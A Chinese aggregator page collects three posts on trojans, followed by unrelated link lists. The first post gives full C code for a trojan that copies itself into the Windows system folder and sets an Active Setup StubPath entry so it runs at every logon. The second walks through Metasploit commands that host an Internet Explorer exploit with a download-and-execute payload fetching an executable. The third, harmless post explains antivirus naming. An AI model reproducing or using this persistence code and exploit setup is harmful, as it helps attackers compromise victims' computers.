教大家如何启动木马

| 收藏本文 下载本文 作者:huang-meimei

下面小编为大家带来教大家如何启动木马(共含3篇),希望能帮助大家!同时,但愿您也能像本文投稿人“huang-meimei”一样,积极向本站投稿分享好文章。

教大家如何启动木马

篇1:教大家如何启动木马

很多人在问如何实现ACTIVEX 木马启动,其实很简单,

mycode:

// blog:www.54rk.cn

#include “stdafx.h”

#define ACTIVE_SETUP “SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{450D8FBA-AD25-11D0-98A8-0800361B1175}”

int APIENTRY WinMain(HINSTANCE hInstance,

HINSTANCE hPrevInstance,

LPSTR    lpCmdLine,

int      nCmdShow)

{

TCHAR szModuleName[MAX_PATH]={0};

TCHAR szDestFath[MAX_PATH];

HKEY hSubKey = 0;

GetModuleFileName(NULL,szModuleName,sizeof(szModuleName));

//获得自身的全路径

GetSystemDirectory(szDestFath, MAX_PATH);

//获取系统目录路径

strcat(szDestFath, “\\active.exe”);

//得到目标全路径

CopyFile(szModuleName,szDestFath,true);

//f复制自身到系统目录下

RegDeleteKey(HKEY_CURRENT_USER, ACTIVE_SETUP);

//HKEY_CURRENT_USERR中的记录,否则用户下次登录时将不再执行

RegCreateKey(HKEY_LOCAL_MACHINE, ACTIVE_SETUP, &hSubKey);

//加载ActiveX启动

RegSetValueEx(hSubKey,“stubpath”,0,REG_EXPAND_SZ,(BYTE *) szDestFath,lstrlen(szDestFath));

RegCloseKey(hSubKey);

//关闭hSubKey的对象

return 0 ;

}

/*vc6.0 xp sp3 测试通过*/

篇2:教你怎样生成并启动木马

用Metasploit生成网马方法:

一、下载www.rec-sec.com/exploits/msf/ie_iepeers_pointer.rb

二、放到C:\Metasploit\Framework3\msf3\modules\exploits\test,我改个了名字叫ie.rb

三、启动msfconsole

四、msf >use exploit/test/ie

msf exploit(ie) >show optinos

回显:

Module options:

Name       Current Setting Required Description

----       --------------- -------- -----------

SRVHOST    0.0.0.0         yes      The local host to listen on.

SRVPORT    8080            yes      The local port to listen on.

SSL        false           no       Negotiate SSL for incoming connections

SSLVersion SSL3            no       Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

URIPATH                     no       The URI to use for this exploit (default is random)

Exploit target:

Id Name

-- ----

0  Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0

msf exploit(ie) >set srvhost 192.168.0.3

srvhost =>192.168.0.3

msf exploit(ie) >set srvport 8080

srvport =>8080

msf exploit(ie) >set payload windows/download_exec

payload =>windows/download_exec

msf exploit(ie) >set url 192.168.0.3/demo.exe

url =>192.168.0.3/demo.exe

msf exploit(ie) >exploit

[*] Exploit running as background job.

msf exploit(ie) >

[*] Using URL: 192.168.0.3:8080/4rJ0JRSnX55wAY

[*] Server started.

然后打开192.168.0.3:8080/4rJ0JRSnX55wAY,你就可以看到源码了,

红字是命令,其它的是回显

篇3:教大家如何辨别木马病毒

很多时候大家已经用各类安全软件、杀毒软件查出了自己的机子中了例如Backdoor.RmtBomb.12、Trojan.Win32.SendIP.15等等这些一串英文还带数字的病毒名,这时有些人就蒙了,那么长一串的名字,我怎么知道是什么]病毒啊?

其实只要我们掌握一些病毒的命名规则,我们就能通过杀毒软件的报告中出现的病毒名来判断该病毒的一些共有的特性了:一般格式为:病毒前缀名・病毒名・病毒后缀名病毒前缀是指一个病毒的种类,他是用来区别病毒的种族分类的,

教大家如何辨别木马病毒

。不同的种类的病毒,其前缀也是不同的。比如我们常见的木马病毒的前缀Trojan,蠕虫病毒的前缀是Worm等等还有其他的。

病毒名是指一个病毒的家族特征,是用来区别和标识病毒家族的,如以前著名的CIH病毒的家族名都是统一的“CIH”,振荡波蠕虫病毒的家族名是“Sasser”。病毒后缀是指一个病毒的变种特征,是用来区别具体某个家族病毒的某个变种的。一般都采用英文中的26个字母来表示,如Worm.Sasser.b就是指振荡波蠕虫病毒的变种B,因此一般称为“振荡波B变种”或者“振荡波变种B”。如果该病毒变种非常多,可以采用数字与字母混合表示变种标识。下面附带一些常见的病毒前缀的解释(针对我们用得最多的Windows操作系统):1、蠕虫病毒

蠕虫病毒的前缀是:Worm,这种病毒的共有特性是通过网络或者系统漏洞进行传播,很大部分的蠕虫病毒都有向外发送带毒邮件,阻塞网络的特性。比如冲击波(阻塞网络),小邮差(发带毒邮件)等(WWW.023DN.COM)。2、系统病毒

系统病毒的前缀为:Win32、PE、Win95、W32、W95等。这些病毒的一般共有的特性是可以感染windows操作系统的*.exe和*.dll文件,并通过这些文件进行传播。如CIH病毒。3、木马病毒、病毒

木马病毒其前缀是:Trojan, 病毒前缀名一般为Hack。木马病毒的共有特性是通过网络或者系统漏洞进入用户的系统并隐藏,然后向外界泄露用户的信息,而 病毒则有一个可视的界面,能对用户的电脑进行远程控制。木马、病毒往往是成对出现的,即木马病毒负责侵入用户的电脑,而 病毒则会通过该木马病毒来进行控制。现在这两种类型都越来越趋向于整合了。一般的木马如QQ消息尾巴木马Trojan.QQ3344,还有大家可能遇见比较多的针对网络游戏的木马病毒如Trojan.LMir.PSW.60。

木马的童话作文

木马退休经典童话

木马和病毒教学反思

CHM电子书木马制作攻略

乌木马的故事读后感

劳动竞赛启动发言稿

启动大会主持稿

启动仪式 主持词

启动大会主持稿

启动会发言稿

教大家如何启动木马(精选3篇)

欢迎下载DOC格式的教大家如何启动木马,但愿能给您带来参考作用!
推荐度: 推荐 推荐 推荐 推荐 推荐
点击下载文档 文档为doc格式
点击下载本文文档